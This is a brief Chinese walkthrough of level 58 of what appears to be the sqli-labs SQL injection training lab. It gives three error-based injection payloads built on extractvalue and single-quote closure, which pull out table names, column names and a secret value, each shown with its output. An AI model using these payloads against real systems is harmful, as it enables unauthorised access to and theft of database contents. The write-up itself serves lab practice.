第58关

通过单引号闭合
报错注入

爆出表名
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))  --+
pe8r1eh2w4

爆出列名
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='pe8r1eh2w4'),0x7e))  --+
id,sessid,secret_C7A4,tryy

爆出信息
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(secret_C7A4) from pe8r1eh2w4),0x7e))  --+
MMVN1cmjtDS9EzVFkHO5dw6G



闯关成功！！！